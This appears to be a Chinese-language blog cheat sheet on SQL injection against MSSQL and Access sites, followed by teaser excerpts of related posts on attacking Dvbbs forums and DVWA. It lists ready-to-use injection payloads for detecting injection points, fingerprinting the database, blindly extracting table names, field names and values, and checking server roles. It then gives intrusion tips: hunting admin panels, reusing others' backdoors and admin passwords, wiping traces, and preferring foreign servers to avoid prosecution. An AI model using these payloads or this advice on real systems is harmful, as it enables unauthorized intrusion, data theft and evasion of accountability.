一、方法總結:
1.判斷是否有注入
and 1=1
and 1=2
2.初步判斷是否是mssql
and user>0
3.判斷資料庫系統
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
4.注入引數是字元
and [查詢條件] and 」=』
5.搜尋時沒過濾引數的
and [查詢條件] and 『%25′=』
6.猜資料庫
and (select count(*) from [資料庫名])>0
7.猜欄位
and (select count(欄位名) from 資料庫名)>0
8.猜字段中記錄長度
and (select top 1 len(欄位名) from 資料庫名)>0
9.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(欄位名,1,1)) from 資料庫名)>0
(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(欄位名,1,1)) from 資料庫名)>0
10.測試許可權結構(mssql)
and 1=(select is_srvrolemember(『sysadmin』));–
and 1=(select is_srvrolemember(『serveradmin』));–
and 1=(select is_srvrolemember(『setupadmin』));–
and 1=(select is_srvrolemember(『securityadmin』));–
and 1=(select is_srvrolemember(『diskadmin』));–
and 1=(select is_srvrolemember(『bulkadmin』));–
and 1=(select is_member(『db_owner』));–
11.mssql內建函式
and (select @@version)>0 獲得windows的版本號
and user_name()=』dbo』 判斷當前系統的連線使用者是不是sa
and (select user_name())>0 爆當前系統的連線使用者
and (select db_name())>0 得到當前連線的資料庫
二、思路總結:
1.刺探環境 2.找到注入點
如果是acc,老老實實的猜解表名,欄位名,然後找後台或者另尋它路
如果是sql的,許可權一般許可權,按照acc的方法走
如果許可權是db,首先考慮備份,不成功再走通用法
如果是sa的就不說了,方法太多了
社會工程學(技巧):
2.列目錄找後台
4.sql的可執行相關命令暴出很多資訊
5.入侵中,用心記每乙個出現的細節,對以後可能有幫助 ,如果有可能,盡好記下,筆記本和記事本無所謂
7.記住最好的後門是用別人的後門,最好的密碼最好用管理員的密碼
8.最後說一點,入侵最好不要掛黑頁,進伺服器後記得登出後退出,不要忘記搓屁股(這點不要學原部落格主,因為原部落格主進的大多數是國外的伺服器,就算查到也關係不大,中國的法律不是開玩笑的)
運氣+時間+技術+經驗=入侵成功
SQL注入入侵動網SQL版論壇
現在動網最新版本是7.0 sp2。應該說安全性已經是很高的了。所以從指令碼本身的問題去突破它難 度不小。但是我們可以從外部的一些途徑間接 搞定 動網.現在iis asp sql2000的組合是比較常見的。而乙個 運用大量的asp指令碼程式,難免不出紕漏。如果一台主機上存在某個sql注入點,而這台主機...
再談SQL注入入侵動網SQL版論壇
現在動網最新版本是7.0 sp2。應該說安全性已經是很高的了。所以從指令碼本身的問題去突破它難度不小。但是我們可以從外部的一些途徑間接 搞定 動網.現在iis asp sql2000的組合是比較常見的。而乙個 運用大量的asp指令碼程式,難免不出紕漏。如果一台主機上存在某個sql注入點,而這台主機又...
DVWA的入侵SQL注入
前言 在攻擊開始前,我們至少要具備操作mysql的一些簡單語句,否則可能此文章對閱讀者的你存在困難,有朋友問這都什麼年代了還會存在sql注入?其實做這個的時候是因為昨天我編寫 的時候寫出了乙個sql注入並且在上線的時候被朋友挖掘了出來,漏洞圖如下,就因為我的一次邏輯判斷錯誤而導致,所以今天想起了寫一...